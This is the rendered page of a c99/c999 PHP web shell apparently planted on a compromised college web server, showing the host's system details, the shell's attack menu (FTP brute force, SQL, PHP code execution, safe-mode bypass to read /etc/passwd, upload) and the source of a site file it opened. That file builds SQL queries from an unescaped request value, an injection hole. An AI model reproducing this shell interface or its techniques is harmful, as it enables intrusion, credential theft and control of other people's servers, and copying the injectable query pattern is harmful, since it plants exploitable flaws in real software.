!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/_manage_depart/   drwxr-xr-x
Free 40.56 GB of 127.8 GB (31.73%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     mapsDetail.php (2.59 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

    
/**  Define Validate Access  */
    
define'_VALID_ACCESS');
    
    
/**  Configuration  */
    
require_once( "../configuration.php" );
    require_once( 
$_Config_absolute_path "/includes/framework.php" );
    require_once( 
"../include/Function.php" );

    
/**  Create Database Object  */
    
$dbObj = new DBConn;
    
/**  Config Table for This Page  */
        
$myTable "mapcollege_tb";
        
$myTablePK "mapId";
        
    
$sql " SELECT *  FROM $myTable   WHERE mapId='$mapId' ";
    
$result $dbObj->execQuery($sql);
    
$rs $dbObj->fetchArray($result);

?>
<html>
<head>
<title>Information Detail</title>
<link href="../css/default.css" rel="stylesheet" type="text/css" />
<meta http-equiv="Content-Type" content="text/html; charset=windows-874" />

<body>
<table width="635" border="0" align="center" cellpadding="0" cellspacing="0">
  <tr>
    <td height="10"></td>
  </tr>
</table>
<table width="635" border="0" align="center" cellpadding="0" cellspacing="0">
  <tr>
    <th width="632" scope="col"><form name="form1" method="post" action="">
      <fieldset>
        <table width="630" border="0">
          <tr>
            <td width="624"><table width="100%" border="0" cellspacing="0" cellpadding="0">
              <tr>
                <td height="30" align="center"><strong class="NOTE"><span class="PADDING-LEFT-5"><font size="2" face="Tahoma">
                  <?php
         $collegeCode 
=  $rss["collegeCode"];
         
$sql "Select * From  college  Where collegeStatus ='1'";
          
$result1 mysql_query($sql) or die("Error".mysql_error());
          
$rs2 mysql_fetch_array($result1);
          echo 
"$rs2[collegeName] ";
         
?>
                </font></span></strong></td>
              </tr>
            </table>
            <table width="100%" border="0" align="center" cellpadding="2" cellspacing="1" bgcolor="#EEEEEE" style="border:0px solid gray">
              <tr>
                <td width="98%" align="center" bordercolor="#CCCCCC" bgcolor="#FFFFFF" class="PADDING-LEFT-5"><? echo htmlspecialchars_decode($rs['mapDetail']); ?></td>
              </tr>              <tr>
                <td bordercolor="#CCCCCC" bgcolor="#FFFFFF" class="PADDING-LEFT-5"><? echo $rs['date_updated']; ?></td>
              </tr>
              <tr>
                <td></td>
              </tr>
            </table>
          </tr>
        </table>
      </fieldset>
      <div align="center"><br>
        <input type="button" name="Submit2" value=" »Ô´Ë¹éÒµèÒ§" onClick="javascript:parent.close();" onMouseOver="this.style.cursor='hand'" />
      </div>
    </form></th>
  </tr>
</table>
</body>
</html>
<?php
    
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0184 ]--